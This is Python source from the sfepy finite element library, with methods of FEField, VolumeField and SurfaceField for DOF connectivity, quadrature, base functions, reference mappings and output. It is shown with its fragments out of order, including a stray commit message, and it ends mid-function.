            data_shape = (shape.n_cell, n_qp, dim, self.econn.shape[1])
        elif integration == 'point':
            dofs = self.get_dofs_in_region(region, merge=True)
            data_shape = (dofs.shape[0], 0, 0, 1)
        else:
            raise NotImplementedError('unsupported integration! (%s)'
                                      % integration)
        return data_shape
    def get_dofs_in_region(self, region, merge=True):
        """
        Return indices of DOFs that belong to the given region and group.
        """
        node_desc = self.node_desc
        dofs = []
        # Collect vertex, edge, face and bubble DOFs separately; each
        # kind is appended only when present in the node description.
        vdofs = nm.empty((0,), dtype=nm.int32)
        if node_desc.vertex is not None:
            vdofs = self.vertex_remap[region.vertices]
            vdofs = vdofs[vdofs >= 0]
        dofs.append(vdofs)
        edofs = nm.empty((0,), dtype=nm.int32)
        if node_desc.edge is not None:
            edofs = self._get_facet_dofs(region.edges,
                                         self.edge_remap,
                                         self.edge_dofs)
        dofs.append(edofs)
        fdofs = nm.empty((0,), dtype=nm.int32)
        if node_desc.face is not None:
            fdofs = self._get_facet_dofs(region.faces,
                                         self.face_remap,
                                         self.face_dofs)
        dofs.append(fdofs)
        bdofs = nm.empty((0,), dtype=nm.int32)
        if (node_desc.bubble is not None) and region.has_cells():
            els = self.bubble_remap[region.cells]
            bdofs = self.bubble_dofs[els[els >= 0]].ravel()
        dofs.append(bdofs)
        if merge:
            dofs = nm.concatenate(dofs)
        return dofs
    def clear_qp_base(self):
        """
        Remove cached quadrature points and base functions.
        """
        self.qp_coors = {}
        self.bf = {}
    def get_qp(self, key, integral):
        """
        Get quadrature points and weights corresponding to the given key
        and integral. The key is 'v' or 's#', where # is the number of
        face vertices.
        """
        qpkey = (integral.order, key)
        if qpkey not in self.qp_coors:
            if (key[0] == 's') and not self.is_surface:
                # Surface quadrature of a volume field: use the facet
                # geometry of the reference element.
                dim = self.gel.dim - 1
                n_fp = self.gel.surface_facet.n_vertex
                geometry = '%d_%d' % (dim, n_fp)
            else:
                geometry = self.gel.name
            vals, weights = integral.get_qp(geometry)
            self.qp_coors[qpkey] = Struct(vals=vals, weights=weights)
        return self.qp_coors[qpkey]
    def substitute_dofs(self, subs, restore=False):
        """
        Perform facet DOF substitutions according to `subs`.
        Modifies `self.econn` in-place and sets `self.econn0`,
        `self.unused_dofs` and `self.basis_transform`.
        """
        if restore and (self.stored_subs is not None):
            # Re-apply previously stored substitutions.
            self.econn0 = self.econn
            self.econn, self.unused_dofs, basis_transform = self.stored_subs
        else:
            if subs is None:
                self.econn0 = self.econn
                return
            else:
                self.econn0 = self.econn.copy()
                self._substitute_dofs(subs)
                self.unused_dofs = nm.setdiff1d(self.econn0, self.econn)
                basis_transform = self._eval_basis_transform(subs)
        self.set_basis_transform(basis_transform)
    def restore_dofs(self, store=False):
        """
        Undoes the effect of :func:`FEField.substitute_dofs()`.
        """
        if self.econn0 is None:
            raise ValueError('no original DOFs to restore!')
        if store:
            # Keep the substituted state for a later re-application.
            self.stored_subs = (self.econn,
                                self.unused_dofs,
                                self.basis_transform)
        else:
            self.stored_subs = None
        self.econn = self.econn0
        self.econn0 = None
        self.unused_dofs = None
        self.basis_transform = None
    def set_basis_transform(self, transform):
        """
        Set local element basis transformation.
        The basis transformation is applied in :func:`FEField.get_base()` and
        :func:`FEField.create_mapping()`.
        Parameters
        ----------
        transform : array, shape `(n_cell, n_ep, n_ep)`
            The array with `(n_ep, n_ep)` transformation matrices for each cell
            in the field's region, where `n_ep` is the number of element DOFs.
        """
        self.basis_transform = transform
    def restore_substituted(self, vec):
        """
        Restore values of the unused DOFs using the transpose of the applied
        basis transformation.
        """
        if (self.econn0 is None) or (self.basis_transform is None):
            raise ValueError('no original DOF values to restore!!')
        vec = vec.reshape((self.n_nod, self.n_components)).copy()
        evec = vec[self.econn]
        # Apply the transposed per-cell basis transformation.
        vec[self.econn0] = nm.einsum('cji,cjk->cik', self.basis_transform, evec)
        return vec.ravel()
    def get_base(self, key, derivative, integral, iels=None,
                 from_geometry=False, base_only=True):
        """
        Return the base function values (and optionally the quadrature
        weights) for the given quadrature `key`, `derivative` order and
        `integral`, using the cached values when available. When
        `from_geometry` is True, the geometry polynomial space is used
        instead of the field one.
        """
        qp = self.get_qp(key, integral)
        if from_geometry:
            ps = self.gel.poly_space
        else:
            ps = self.poly_space
        # Geometry bases are cached under a distinct ('g' + key) key.
        _key = key if not from_geometry else 'g' + key
        bf_key = (integral.order, _key, derivative)
        if bf_key not in self.bf:
            ori = self.ori
            self.bf[bf_key] = ps.eval_base(qp.vals, diff=derivative, ori=ori,
                                           transform=self.basis_transform)
        bf = self.bf[bf_key]
        if iels is not None and bf.ndim == 4:
            # Per-cell base (e.g. oriented/transformed): restrict to iels.
            bf = bf[iels]
        if base_only:
            return bf
        else:
            return bf, qp.weights
    def create_bqp(self, region_name, integral):
        """
        Create and cache the boundary quadrature points for the surface
        region `region_name` by interpolating the reference element
        coordinates into its faces.
        """
        gel = self.gel
        sd = self.surface_data[region_name]
        bqpkey = (integral.order, sd.bkey)
        if not bqpkey in self.qp_coors:
            qp = self.get_qp(sd.face_type, integral)
            ps_s = self.gel.surface_facet.poly_space
            bf_s = ps_s.eval_base(qp.vals)
            coors, faces = gel.coors, gel.get_surface_entities()
            vals = _interp_to_faces(coors, bf_s, faces)
            self.qp_coors[bqpkey] = Struct(name='BQP_%s' % sd.bkey,
                                           vals=vals, weights=qp.weights)
    def extend_dofs(self, dofs, fill_value=None):
        """
        Extend DOFs to the whole domain using the `fill_value`, or the
        smallest value in `dofs` if `fill_value` is None.
        """
        if fill_value is None:
            if nm.isrealobj(dofs):
                fill_value = get_min_value(dofs)
            else:
                # Complex values - treat real and imaginary parts separately.
                fill_value = get_min_value(dofs.real)
                fill_value += 1j * get_min_value(dofs.imag)
        if self.approx_order != 0:
            indx = self.get_vertices()
            n_nod = self.domain.shape.n_nod
            new_dofs = nm.empty((n_nod, dofs.shape[1]), dtype=self.dtype)
            new_dofs.fill(fill_value)
            new_dofs[indx] = dofs[:indx.size]
        else:
            # Constant approximation: extend cell data instead.
            new_dofs = extend_cell_data(dofs, self.domain, self.region,
                                        val=fill_value)
        return new_dofs
    def remove_extra_dofs(self, dofs):
        """
        Remove DOFs defined in higher order nodes (order > 1).
        """
        if self.approx_order != 0:
            new_dofs = dofs[:self.n_vertex_dof]
        else:
            new_dofs = dofs
        return new_dofs
    def linearize(self, dofs, min_level=0, max_level=1, eps=1e-4):
        """
        Linearize the solution for post-processing.
        Parameters
        ----------
        dofs : array, shape (n_nod, n_component)
            The array of DOFs reshaped so that each column corresponds
            to one component.
        min_level : int
            The minimum required level of mesh refinement.
        max_level : int
            The maximum level of mesh refinement.
        eps : float
            The relative tolerance parameter of mesh adaptivity.
        Returns
        -------
        mesh : Mesh instance
            The adapted, nonconforming, mesh.
        vdofs : array
            The DOFs defined in vertices of `mesh`.
        levels : array of ints
            The refinement level used for each element group.
        """
        assert_(dofs.ndim == 2)
        n_nod, dpn = dofs.shape
        assert_(n_nod == self.n_nod)
        assert_(dpn == self.shape[0])
        vertex_coors = self.coors[:self.n_vertex_dof, :]
        ps = self.poly_space
        gps = self.gel.poly_space
        vertex_conn = self.econn[:, :self.gel.n_vertex]
        eval_dofs = get_eval_dofs(dofs, self.econn, ps, ori=self.ori)
        eval_coors = get_eval_coors(vertex_coors, vertex_conn, gps)
        (level, coors, conn,
         vdofs, mat_ids) = create_output(eval_dofs, eval_coors,
                                         vertex_conn.shape[0], ps,
                                         min_level=min_level,
                                         max_level=max_level, eps=eps)
        mesh = Mesh.from_data('linearized_mesh', coors, None, [conn], [mat_ids],
                              self.domain.mesh.descs)
        return mesh, vdofs, level
    def get_output_approx_order(self):
        """
        Get the approximation order used in the output file.
        """
        return min(self.approx_order, 1)
    def create_output(self, dofs, var_name, dof_names=None,
                      key=None, extend=True, fill_value=None,
                      linearization=None):
        """
        Convert the DOFs corresponding to the field to a dictionary of
        output data usable by Mesh.write().
        Parameters
        ----------
        dofs : array, shape (n_nod, n_component)
            The array of DOFs reshaped so that each column corresponds
            to one component.
        var_name : str
            The variable name corresponding to `dofs`.
        dof_names : tuple of str
            The names of DOF components.
        key : str, optional
            The key to be used in the output dictionary instead of the
            variable name.
        extend : bool
            Extend the DOF values to cover the whole domain.
        fill_value : float or complex
            The value used to fill the missing DOF values if `extend` is True.
        linearization : Struct or None
            The linearization configuration for higher order approximations.
        Returns
        -------
        out : dict
            The output dictionary.
        """
        linearization = get_default(linearization, Struct(kind='strip'))
        out = {}
        if linearization.kind is None:
            # Raw DOF values, no processing.
            out[key] = Struct(name='output_data', mode='full',
                              data=dofs, var_name=var_name,
                              dofs=dof_names, field_name=self.name)
        elif linearization.kind == 'strip':
            if extend:
                ext = self.extend_dofs(dofs, fill_value)
            else:
                ext = self.remove_extra_dofs(dofs)
            if ext is not None:
                approx_order = self.get_output_approx_order()
                if approx_order != 0:
                    # Has vertex data.
                    out[key] = Struct(name='output_data', mode='vertex',
                                      data=ext, var_name=var_name,
                                      dofs=dof_names)
                else:
                    ext.shape = (ext.shape[0], 1, ext.shape[1], 1)
                    out[key] = Struct(name='output_data', mode='cell',
                                      data=ext, var_name=var_name,
                                      dofs=dof_names)
        else:
            # Adaptive linearization for higher order approximations.
            mesh, vdofs, levels = self.linearize(dofs,
                                                 linearization.min_level,
                                                 linearization.max_level,
                                                 linearization.eps)
            out[key] = Struct(name='output_data', mode='vertex',
                              data=vdofs, var_name=var_name, dofs=dof_names,
                              mesh=mesh, levels=levels)
        out = convert_complex_output(out)
        return out
    def create_mesh(self, extra_nodes=True):
        """
        Create a mesh from the field region, optionally including the field
        extra nodes.
        """
        mesh = self.domain.mesh
        if self.approx_order != 0:
            if extra_nodes:
                conn = self.econn
            else:
                conn = self.econn[:, :self.gel.n_vertex]
            conns = [conn]
            mat_ids = [mesh.cmesh.cell_groups]
            descs = mesh.descs[:1]
            if extra_nodes:
                coors = self.coors
            else:
                coors = self.coors[:self.n_vertex_dof]
            mesh = Mesh.from_data(self.name, coors, None, conns,
                                  mat_ids, descs)
        return mesh
    def get_evaluate_cache(self, cache=None, share_geometry=False,
                           verbose=False):
        """
        Get the evaluate cache for :func:`Variable.evaluate_at()
        <sfepy.discrete.variables.Variable.evaluate_at()>`.
        Parameters
        ----------
        cache : Struct instance, optional
            Optionally, use the provided instance to store the cache data.
        share_geometry : bool
            Set to True to indicate that all the evaluations will work on the
            same region. Certain data are then computed only for the first
            probe and cached.
        verbose : bool
            If False, reduce verbosity.
        Returns
        -------
        cache : Struct instance
            The evaluate cache.
        """
        try:
            from scipy.spatial import cKDTree as KDTree
        except ImportError:
            from scipy.spatial import KDTree
        from sfepy.discrete.fem.geometry_element import create_geometry_elements
        if cache is None:
            cache = Struct(name='evaluate_cache')
        timer = Timer(start=True)
        if (cache.get('cmesh', None) is None) or not share_geometry:
            mesh = self.create_mesh(extra_nodes=False)
            cache.cmesh = cmesh = mesh.cmesh
            gels = create_geometry_elements()
            cmesh.set_local_entities(gels)
            cmesh.setup_entities()
            cache.centroids = cmesh.get_centroids(cmesh.tdim)
            if self.gel.name != '3_8':
                cache.normals0 = cmesh.get_facet_normals()
                cache.normals1 = None
            else:
                # Hexahedral cells need both normal orientations.
                cache.normals0 = cmesh.get_facet_normals(0)
                cache.normals1 = cmesh.get_facet_normals(1)
        output('cmesh setup: %f s' % timer.stop(), verbose=verbose)
        timer.start()
        if (cache.get('kdtree', None) is None) or not share_geometry:
            cache.kdtree = KDTree(cmesh.coors)
        output('kdtree: %f s' % timer.stop(), verbose=verbose)
        return cache
    def interp_to_qp(self, dofs):
        """
        Interpolate DOFs into quadrature points.
        The quadrature order is given by the field approximation order.
        Parameters
        ----------
        dofs : array
            The array of DOF values of shape `(n_nod, n_component)`.
        Returns
        -------
        data_qp : array
            The values interpolated into the quadrature points.
        integral : Integral
            The corresponding integral defining the quadrature points.
        """
        integral = Integral('i', order=self.approx_order)
        bf = self.get_base('v', False, integral)
        bf = bf[:,0,:].copy()
        data_qp = nm.dot(bf, dofs[self.econn])
        data_qp = nm.swapaxes(data_qp, 0, 1)
        data_qp.shape = data_qp.shape + (1,)
        return data_qp, integral
    def get_coor(self, nods=None):
        """
        Get coordinates of the field nodes.
        Parameters
        ----------
        nods : array, optional
            The indices of the required nodes. If not given, the
            coordinates of all the nodes are returned.
        """
        if nods is None:
            return self.coors
        else:
            return self.coors[nods]
    def get_connectivity(self, region, integration, is_trace=False):
        """
        Convenience alias to `Field.get_econn()`, that is used in some terms.
        """
        return self.get_econn(integration, region, is_trace=is_trace)
    def create_mapping(self, region, integral, integration,
                       return_mapping=True):
        """
        Create a new reference mapping.
        Compute jacobians, element volumes and base function derivatives
        for Volume-type geometries (volume mappings), and jacobians,
        normals and base function derivatives for Surface-type
        geometries (surface mappings).
        Notes
        -----
        - surface mappings are defined on the surface region
        - surface mappings require field order to be > 0
        """
        domain = self.domain
        coors = domain.get_mesh_coors(actual=True)
        dconn = domain.get_conn()
        if integration == 'volume':
            qp = self.get_qp('v', integral)
            iels = region.get_cells()
            geo_ps = self.gel.poly_space
            ps = self.poly_space
            bf = self.get_base('v', 0, integral, iels=iels)
            conn = nm.take(dconn, iels.astype(nm.int32), axis=0)
            mapping = VolumeMapping(coors, conn, poly_space=geo_ps)
            vg = mapping.get_mapping(qp.vals, qp.weights, poly_space=ps,
                                     ori=self.ori,
                                     transform=self.basis_transform)
            out = vg
        elif (integration == 'surface') or (integration == 'surface_extra'):
            assert_(self.approx_order > 0)
            if self.ori is not None:
                msg = 'surface integrals do not work yet with the' \
                      ' hierarchical basis!'
                raise ValueError(msg)
            sd = domain.surface_groups[region.name]
            esd = self.surface_data[region.name]
            geo_ps = self.gel.poly_space
            ps = self.poly_space
            conn = sd.get_connectivity()
            mapping = SurfaceMapping(coors, conn, poly_space=geo_ps)
            if not self.is_surface:
                # Volume field on a surface region: evaluate the base in
                # the boundary quadrature points.
                self.create_bqp(region.name, integral)
                qp = self.qp_coors[(integral.order, esd.bkey)]
                abf = ps.eval_base(qp.vals[0], transform=self.basis_transform)
                bf = abf[..., self.efaces[0]]
                indx = self.gel.get_surface_entities()[0]
                # Fix geometry element's 1st facet orientation for gradients.
                indx = nm.roll(indx, -1)[::-1]
                mapping.set_basis_indices(indx)
                sg = mapping.get_mapping(qp.vals[0], qp.weights,
                                         poly_space=Struct(n_nod=bf.shape[-1]),
                                         mode=integration)
                if integration == 'surface_extra':
                    sg.alloc_extra_data(self.econn.shape[1])
                    bf_bg = geo_ps.eval_base(qp.vals, diff=True)
                    ebf_bg = self.get_base(esd.bkey, 1, integral)
                    sg.evaluate_bfbgm(bf_bg, ebf_bg, coors, sd.fis, dconn)
            else:
                # Do not use BQP for surface fields.
                qp = self.get_qp(sd.face_type, integral)
                bf = ps.eval_base(qp.vals, transform=self.basis_transform)
                sg = mapping.get_mapping(qp.vals, qp.weights,
                                         poly_space=Struct(n_nod=bf.shape[-1]),
                                         mode=integration)
            out = sg
        elif integration == 'point':
            out = mapping = None
        elif integration == 'custom':
            raise ValueError('cannot create custom mapping!')
        else:
            raise ValueError('unknown integration geometry type: %s'
                             % integration)
        if out is not None:
            # Store the integral used.
            out.integral = integral
            out.qp = qp
            out.ps = ps
            # Update base.
            out.bf[:] = bf
        if return_mapping:
            out = (out, mapping)
        return out
class VolumeField(FEField):
    """
    Finite element field base class over volume elements (element dimension
    equals space dimension).
    """

    def _check_region(self, region):
        """
        Check whether the `region` can be used for the
        field.

        Returns
        -------
        ok : bool
            True if the region is usable for the field.
        """
        ok = True
        domain = region.domain
        if region.kind != 'cell':
            output("bad region kind! (is: %r, should be: 'cell')"
                   % region.kind)
            ok = False

        elif (region.kind_tdim != domain.shape.tdim):
            output('cells with a bad topological dimension! (%d == %d)'
                   % (region.kind_tdim, domain.shape.tdim))
            ok = False

        return ok

    def _setup_geometry(self):
        """
        Setup the field region geometry.

        Finds the reference geometry element matching all the region cells.
        """
        cmesh = self.domain.cmesh
        for key, gel in six.iteritems(self.domain.geom_els):
            ct = cmesh.cell_types
            if (ct[self.region.cells] == cmesh.key_to_index[gel.name]).all():
                self.gel = gel
                break

        else:
            raise ValueError('region %s of field %s contains multiple'
                             ' reference geometries!'
                             % (self.region.name, self.name))

        self.is_surface = False

    def _create_interpolant(self):
        """
        Create the polynomial space (interpolant) of the field.
        """
        name = '%s_%s_%s_%d%s' % (self.gel.name, self.space,
                                  self.poly_space_base, self.approx_order,
                                  'B' * self.force_bubble)
        ps = PolySpace.any_from_args(name, self.gel, self.approx_order,
                                     base=self.poly_space_base,
                                     force_bubble=self.force_bubble)
        self.poly_space = ps

    def _init_econn(self):
        """
        Initialize the extended DOF connectivity.
        """
        n_ep = self.poly_space.n_nod
        n_cell = self.region.get_n_cells()
        self.econn = nm.zeros((n_cell, n_ep), nm.int32)

    def _setup_vertex_dofs(self):
        """
        Setup vertex DOF connectivity.
        """
        if self.node_desc.vertex is None:
            return 0, None

        region = self.region

        cmesh = self.domain.cmesh
        conn, offsets = cmesh.get_incident(0, region.cells, region.tdim,
                                           ret_offsets=True)

        vertices = nm.unique(conn)
        remap = prepare_remap(vertices, region.n_v_max)
        n_dof = vertices.shape[0]

        # All cells must have the same number of vertices.
        aux = nm.unique(nm.diff(offsets))
        assert_(len(aux) == 1, 'region with multiple reference geometries!')
        offset = aux[0]

        # Remap vertex node connectivity to field-local numbering.
        aux = conn.reshape((-1, offset)).astype(nm.int32)
        self.econn[:, :offset] = nm.take(remap, aux)

        return n_dof, remap

    def setup_extra_data(self, geometry, info, is_trace):
        """
        Setup surface or point data needed by terms with the given
        DOF connectivity type.
        """
        dct = info.dc_type.type

        # Use identity-aware comparison instead of `!= None`.
        if geometry is not None:
            geometry_flag = 'surface' in geometry
        else:
            geometry_flag = False

        if (dct == 'surface') or (geometry_flag):
            reg = info.get_region()
            mreg_name = info.get_region_name(can_trace=False)

            self.domain.create_surface_group(reg)
            self.setup_surface_data(reg, is_trace, mreg_name)

        elif dct == 'edge':
            raise NotImplementedError('dof connectivity type %s' % dct)

        elif dct == 'point':
            self.setup_point_data(self, info.region)

        elif dct not in ('volume', 'scalar', 'custom'):
            raise ValueError('unknown dof connectivity type! (%s)' % dct)

    def setup_point_data(self, field, region):
        """
        Setup point DOF connectivity of the given region as a column vector.
        """
        if region.name not in self.point_data:
            conn = field.get_dofs_in_region(region, merge=True)
            conn.shape += (1,)

            self.point_data[region.name] = conn

    def setup_surface_data(self, region, is_trace=False, trace_region=None):
        """
        Setup surface data of the given region.

        Notes
        -----
        ``nodes[leconn] == econn``; nodes are sorted by node number, i.e.
        in the same order as `region.vertices`.
        """
        if region.name not in self.surface_data:
            sd = FESurface('surface_data_%s' % region.name, region,
                           self.efaces, self.econn, self.region)
            self.surface_data[region.name] = sd

        # The block above guarantees the surface data exist here.
        if is_trace:
            sd = self.surface_data[region.name]
            sd.setup_mirror_connectivity(region, trace_region)

        return self.surface_data[region.name]

    def get_econn(self, conn_type, region, is_trace=False, integration=None):
        """
        Get extended connectivity of the given type in the given region.
        """
        ct = conn_type.type if isinstance(conn_type, Struct) else conn_type

        if ct in ('volume', 'custom'):
            if region.name == self.region.name:
                conn = self.econn

            else:
                # Restrict the connectivity to the given sub-region cells.
                tco = integration in ('volume', 'custom')
                cells = region.get_cells(true_cells_only=tco)
                ii = self.region.get_cell_indices(cells, true_cells_only=tco)
                conn = nm.take(self.econn, ii, axis=0)

        elif ct == 'surface':
            sd = self.surface_data[region.name]
            conn = sd.get_connectivity(is_trace=is_trace)

        elif ct == 'edge':
            raise NotImplementedError('connectivity type %s' % ct)

        elif ct == 'point':
            conn = self.point_data[region.name]

        else:
            raise ValueError('unknown connectivity type! (%s)' % ct)

        return conn

    def average_qp_to_vertices(self, data_qp, integral):
        r"""
        Average data given in quadrature points in region elements into
        region vertices.

        .. math::
           u_n = \sum_e (u_{e,avg} * volume_e) / \sum_e volume_e
               = \sum_e \int_{volume_e} u / \sum volume_e
        """
        region = self.region

        n_cells = region.get_n_cells()
        if n_cells != data_qp.shape[0]:
            msg = 'incompatible shape! (%d == %d)' % (n_cells,
                                                      data_qp.shape[0])
            raise ValueError(msg)

        n_vertex = self.n_vertex_dof
        nc = data_qp.shape[2]

        nod_vol = nm.zeros((n_vertex,), dtype=nm.float64)
        data_vertex = nm.zeros((n_vertex, nc), dtype=nm.float64)

        vg = self.get_mapping(self.region, integral, 'volume')[0]

        volume = nm.squeeze(vg.volume)
        iels = self.region.get_cells()

        data_e = nm.zeros((volume.shape[0], 1, nc, 1), dtype=nm.float64)
        vg.integrate(data_e, data_qp[iels])

        ir = nm.arange(nc, dtype=nm.int32)

        conn = self.econn[:, :self.gel.n_vertex]
        for ii, cc in enumerate(conn):
            # Assumes unique nodes in cc!
            ind2, ind1 = nm.meshgrid(ir, cc)
            data_vertex[ind1, ind2] += data_e[iels[ii], 0, :, 0]
            nod_vol[cc] += volume[ii]

        data_vertex /= nod_vol[:, nm.newaxis]

        return data_vertex
class SurfaceField(FEField):
    """
    Finite element field base class over surface (element dimension is one
    less than space dimension).
    """

    def _check_region(self, region):
        """
        Check whether the `region` can be used for the
        field.

        Returns
        -------
        ok : bool
            True if the region is usable for the field.
        """
        # The region must be of facet kind and non-empty...
        ok1 = ((region.kind_tdim == (region.tdim - 1))
               and (region.get_n_cells(True) > 0))
        if not ok1:
            output('bad region topological dimension and kind! (%d, %s)'
                   % (region.tdim, region.kind))

        # ...with all of its facets on the domain surface.
        n_ns = region.get_facet_indices().shape[0] - region.get_n_cells(True)
        ok2 = n_ns == 0
        if not ok2:
            output('%d region facets are not on the domain surface!' % n_ns)

        return ok1 and ok2

    def _setup_geometry(self):
        """
        Setup the field region geometry.

        Assumes a single surface facet geometry for the whole domain.
        """
        for key, vgel in six.iteritems(self.domain.geom_els):
            self.gel = vgel.surface_facet
            break

        if self.gel is None:
            raise ValueError('cells with no surface!')

        self.is_surface = True

    def _create_interpolant(self):
        """
        Create the polynomial space (interpolant) of the field.
        """
        name = '%s_%s_%s_%d%s' % (self.gel.name, self.space,
                                  self.poly_space_base, self.approx_order,
                                  'B' * self.force_bubble)
        ps = PolySpace.any_from_args(name, self.gel, self.approx_order,
                                     base=self.poly_space_base,
                                     force_bubble=self.force_bubble)
        self.poly_space = ps

    def setup_extra_data(self, geometry, info, is_trace):
        """
        Setup mirror connectivity for trace terms; only the 'surface'
        DOF connectivity type is supported.
        """
        dct = info.dc_type.type
        if dct != 'surface':
            msg = "dof connectivity type must be 'surface'! (%s)" % dct
            raise ValueError(msg)

        reg = info.get_region()
        if reg.name not in self.surface_data:
            # Defined in setup_vertex_dofs()
            msg = 'no surface data of surface field! (%s)' % reg.name
            raise ValueError(msg)

        # The check above guarantees the surface data exist here.
        if is_trace:
            sd = self.surface_data[reg.name]
            mreg_name = info.get_region_name(can_trace=False)
            sd.setup_mirror_connectivity(reg, mreg_name)

    def _init_econn(self):
        """
        Initialize the extended DOF connectivity.
        """
        n_ep = self.poly_space.n_nod
        n_cell = self.region.get_n_cells(is_surface=self.is_surface)
        self.econn = nm.zeros((n_cell, n_ep), nm.int32)

    def _setup_vertex_dofs(self):
        """
        Setup vertex DOF connectivity.
        """
        if self.node_desc.vertex is None:
            return 0, None

        region = self.region

        remap = prepare_remap(region.vertices, region.n_v_max)
        n_dof = region.vertices.shape[0]

        # Remap vertex node connectivity to field-local numbering.
        conn, gel = self.domain.get_conn(ret_gel=True)
        faces = gel.get_surface_entities()
        aux = FESurface('aux', region, faces, conn)
        self.econn[:, :aux.n_fp] = aux.leconn
        self.surface_data[region.name] = aux

        return n_dof, remap

    def _setup_bubble_dofs(self):
        """
        Setup bubble DOF connectivity - surface fields have no bubble DOFs.
        """
        return 0, None, None

    def get_econn(self, conn_type, region, is_trace=False,
                  integration=None):
        """
        Get extended connectivity of the given type in the given region.
        """
        ct = conn_type.type if isinstance(conn_type, Struct) else conn_type

        if ct != 'surface':
            msg = 'connectivity type must be "surface"! (%s)' % ct
            raise ValueError(msg)

        sd = self.surface_data[region.name]
        conn = sd.get_connectivity(local=True, is_trace=is_trace)

        return conn

    def average_qp_to_vertices(self, data_qp, integral):
        r"""
        Average data given in quadrature points in region elements into
        region vertices.

        .. math::
           u_n = \sum_e (u_{e,avg} * area_e) / \sum_e area_e
               = \sum_e \int_{area_e} u / \sum area_e
        """
        region = self.region

        n_cells = region.get_n_cells(True)
        if n_cells != data_qp.shape[0]:
            msg = 'incompatible shape! (%d == %d)' % (n_cells,
                                                      data_qp.shape[0])
            raise ValueError(msg)

        n_vertex = len(region.vertices)
        nc = data_qp.shape[2]

        nod_vol = nm.zeros((n_vertex,), dtype=nm.float64)
        data_vertex = nm.zeros((n_vertex, nc), dtype=nm.float64)

        sg = self.get_mapping(self.region, integral, 'surface')[0]

        area = nm.squeeze(sg.volume)
        iels = nm.arange(n_cells, dtype=nm.int32)

        data_e = nm.zeros((area.shape[0], 1, nc, 1), dtype=nm.float64)
        sg.integrate(data_e, data_qp[iels])

        ir = nm.arange(nc, dtype=nm.int32)

        sd = self.domain.surface_groups[region.name]
        # Should be vertex connectivity!
        conn = sd.get_connectivity(local=True)
        for ii, cc in enumerate(conn):
            # Assumes unique nodes in cc!
            ind2, ind1 = nm.meshgrid(ir, cc)
            data_vertex[ind1, ind2] += data_e[iels[ii], 0, :, 0]
            nod_vol[cc] += area[ii]

        data_vertex /= nod_vol[:, nm.newaxis]

        return data_vertex
class H1Mixin(Struct):
    """
    Methods of fields specific to H1 space.
    """

    def _setup_shape(self):
        """
        Setup the field's shape-related attributes, see :class:`Field`.
        """
        # In H1 space the value shape equals the field shape; the DOF
        # per node count is the product of its entries.
        shape = self.shape
        self.val_shape = shape
        self.n_components = nm.prod(shape)
fix FEField.create_mapping() for basis transform and subdomains
- WIP - raise exception for surface integration
"""
Notes
-----
Important attributes of continuous (order > 0) :class:`Field` and
:class:`SurfaceField` instances:
- `vertex_remap` : `econn[:, :n_vertex] = vertex_remap[conn]`
- `vertex_remap_i` : `conn = vertex_remap_i[econn[:, :n_vertex]]`
where `conn` is the mesh vertex connectivity, `econn` is the
region-local field connectivity.
"""
from __future__ import absolute_import
import numpy as nm
from sfepy.base.base import output, get_default, assert_
from sfepy.base.base import Struct
from sfepy.base.timing import Timer
from sfepy.discrete.common.fields import parse_shape, Field
from sfepy.discrete.fem.mesh import Mesh
from sfepy.discrete.fem.meshio import convert_complex_output
from sfepy.discrete.fem.utils import (extend_cell_data, prepare_remap,
invert_remap, get_min_value)
from sfepy.discrete.fem.mappings import VolumeMapping, SurfaceMapping
from sfepy.discrete.fem.poly_spaces import PolySpace
from sfepy.discrete.fem.fe_surface import FESurface
from sfepy.discrete.integrals import Integral
from sfepy.discrete.fem.linearizer import (get_eval_dofs, get_eval_coors,
create_output)
import six
def set_mesh_coors(domain, fields, coors, update_fields=False, actual=False,
                   clear_all=True, extra_dofs=False):
    """
    Update the mesh coordinates of `domain`.

    Parameters
    ----------
    domain : Domain
        The domain whose mesh coordinates are updated.
    fields : dict
        The fields to update when `update_fields` is True.
    coors : array
        The new coordinates; only the first `domain.mesh.n_nod` rows are
        used for the mesh.
    update_fields : bool
        If True, also update the coordinates of all field nodes and clear
        the field mappings.
    actual : bool
        If True, update the actual coordinates (`coors_act`), otherwise
        the cmesh coordinates.
    clear_all : bool
        Passed to `Field.clear_mappings()`.
    extra_dofs : bool
        Passed to `Field.set_coors()`.
    """
    n_nod = domain.mesh.n_nod

    if actual:
        mesh = domain.mesh
        # Lazily allocate the actual coordinates array on first use.
        if not hasattr(mesh, 'coors_act'):
            mesh.coors_act = nm.zeros_like(mesh.coors)
        mesh.coors_act[:] = coors[:n_nod]

    else:
        domain.cmesh.coors[:] = coors[:n_nod]

    if not update_fields:
        return

    for field in six.itervalues(fields):
        field.set_coors(coors, extra_dofs=extra_dofs)
        field.clear_mappings(clear_all=clear_all)
def eval_nodal_coors(coors, mesh_coors, region, poly_space, geom_poly_space,
                     econn, only_extra=True):
    """
    Compute coordinates of nodes corresponding to `poly_space`, given
    mesh coordinates and `geom_poly_space`.

    The computed coordinates are written in-place into `coors` at the
    positions given by the extended connectivity `econn`.

    Parameters
    ----------
    coors : array
        The output coordinate array, modified in-place.
    mesh_coors : array
        The mesh vertex coordinates.
    region : Region
        The region providing the cell-vertex incidence.
    poly_space : PolySpace
        The polynomial space whose node coordinates are evaluated.
    geom_poly_space : PolySpace
        The geometry polynomial space used to interpolate node positions
        from the mesh vertices.
    econn : array
        The extended DOF connectivity.
    only_extra : bool
        If True, compute only the extra (non-vertex) nodes; vertex node
        coordinates are assumed to be set already.
    """
    if only_extra:
        # Select rows with positive first node-type entry - presumably the
        # non-vertex (extra) nodes; TODO confirm nts semantics.
        iex = (poly_space.nts[:,0] > 0).nonzero()[0]
        if iex.shape[0] == 0: return

        qp_coors = poly_space.node_coors[iex, :]
        econn = econn[:, iex].copy()

    else:
        qp_coors = poly_space.node_coors

    ##
    # Evaluate geometry interpolation base functions in (extra) nodes.
    bf = geom_poly_space.eval_base(qp_coors)
    bf = bf[:,0,:].copy()

    ##
    # Evaluate extra coordinates with 'bf'.
    cmesh = region.domain.cmesh
    conn = cmesh.get_incident(0, region.cells, region.tdim)
    # One row of incident vertices per region cell.
    conn.shape = (econn.shape[0], -1)

    # (n_node, n_cell, dim) -> transpose to follow econn's (cell, node) order.
    ecoors = nm.dot(bf, mesh_coors[conn])
    coors[econn] = nm.swapaxes(ecoors, 0, 1)
def _interp_to_faces(vertex_vals, bfs, faces):
    """
    Interpolate vertex values into per-face quadrature points using the
    given surface base functions.

    Returns an array of shape `(n_face, n_qp, dim)`.
    """
    dim = vertex_vals.shape[1]
    n_face, n_qp = faces.shape[0], bfs.shape[0]

    # The base function matrix is the same for all faces - hoist it.
    base = bfs[:, 0, :]

